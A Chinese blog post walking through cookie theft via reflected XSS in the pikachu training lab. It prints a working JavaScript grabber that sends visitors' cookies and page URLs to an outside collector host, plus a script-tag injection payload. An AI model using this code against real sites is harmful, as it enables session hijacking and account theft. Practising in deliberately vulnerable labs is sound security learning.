热门标签
热门文章
- 1解决“The method XXXXXX of type XXXXXXXXX must override a superclass method”
- 2matplotlib之折线图_matplotlib 折线图乱的
- 3微信小程序自定义 tab-bar(基于 wepy)_wepy实现custom-tab-bar
- 4Logback在配置中不能正确输出debug信息的解决
- 5java并发 —— AQS 详细介绍_java aqs
- 6Pandas数据排序,人人都能学会的几种方法
- 7未来已来,快速了解即将颠覆世界的ChatGPT_chatgpt未来已来
- 8cuda9需安装Visual Studio 2017_cuda必须要visualstudio吗
- 9【fork与vfork的区别】_fork和vfork的区别
- 10内存踩踏如何检测_内存飞踩 维测
当前位置: article > 正文
XSS平台获取cookie_xss获取cookie的方法
作者:小小林熬夜学编程 | 2024-02-27 04:25:51
赞
踩
xss获取cookie的方法
XSS平台获取cookie
1.环境介绍
- 靶场:pikachu
- XSS平台:BLUE-LOTUS
- 浏览器:谷歌浏览器
2.流程介绍
登录XSS平台,创建获取cookie的脚本
var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return document.location.href } catch (e) { return '' } })()) + '&toplocation=' + escape((function() { try { return top.location.href } catch (e) { return '' } })()) + '&cookie=' + escape((function() { try { return document.cookie } catch (e) { return '' } })()) + '&opener=' + escape((function() { try { return (window.opener && window.opener.location.href) ? window.opener.location.href : '' } catch (e) { return '' } })()); })();
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
登录pikachu,选择Cross-Site-Scripting下的反射型XSS(get)
由于输入框在前端进行了长度限制,可以选择检查进行修改
然后再输入框内输入payload
<script src="https:///网站地址/myjs/cookie.js"></script>
- 1
执行后就可以在XSS接收面板获取到用户的cookie信息了
3.遇到的问题
由于我自己搭建的平台使用的是https协议,而模板自动生成的是http所以导致不能接收到cookie信息
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小小林熬夜学编程/article/detail/150021
推荐阅读
相关标签
